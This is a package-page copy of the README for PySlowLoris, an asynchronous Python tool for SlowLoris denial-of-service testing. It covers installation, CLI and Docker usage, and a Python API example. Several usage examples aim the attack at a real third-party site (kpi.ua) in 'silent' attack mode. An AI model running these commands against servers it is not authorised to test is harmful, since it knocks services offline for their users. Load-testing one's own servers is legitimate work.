PySlowLoris is a tool for testing if your web server is vulnerable to slow-requests kind of attacks. The module is based on python-trio for Asynchronous I/O and poetry for dependency management. The idea behind this approach to create as many connections with a server as possible and keep them alive and send trash headers through the connection. Please DO NOT use this in the real attacks on the servers.
More information about the attack you can find here.
For installation through the PyPI:
$ pip install pyslowloris==2.0.1
This method is prefered for installation of the most recent stable release.
For installation through the source-code for local development:
$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ pip install poetry
$ pyenv install 3.8.3
$ pyenv local 3.8.3
$ poetry env use 3.8.3
Available command list:
$ slowloris --help
usage: slowloris [-h] -u URL [-c CONNECTION_COUNT] [-s]
Asynchronous Python implementation of SlowLoris attack
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Link to a web server (http://google.com) - str
-c CONNECTION_COUNT, --connection-count CONNECTION_COUNT
Count of active connections (default value is 247) - int
-s, --silent Ignore all of the errors [pure attack mode] - bool
Pull the image from Docker Hub and run a container:
$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]
Also you can build image from Dockerfile and run a container:
$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-c CONNECTION_COUNT] [-s SILENT]
Note: Don't forget about 'sudo'!
Here is an example of usage
from pyslowloris import HostAddress, SlowLorisAttack
url = HostAddress.from_url("http://kpi.ua")
connections_count = 100
loris = SlowLorisAttack(url, connections_count, silent=True)
loris.start()
The following command helps to use module from command line
$ slowloris -u http://kpi.ua/ -c 100 -s
$ docker-compose up web_server -d
$ .....
$ make pytest
If you find bugs or have suggestions about improving the module, don't hesitate to contact me.
This project is licensed under the MIT License - see the LICENSE file for details
Copyright (c) 2017-2020 Maxim Krivich
FAQs
Asynchronous Python implementation of SlowLoris DoS attack
We found that pyslowloris demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Security News
Research
An advanced npm supply chain attack is leveraging Ethereum smart contracts for decentralized, persistent malware control, evading traditional defenses.
Security News
Research
Attackers are impersonating Sindre Sorhus on npm with a fake 'chalk-node' package containing a malicious backdoor to compromise developers' projects.
Security News
The npm package for the LottieFiles Player web component was hit with a supply chain attack after a software engineer's npmjs credentials were compromised.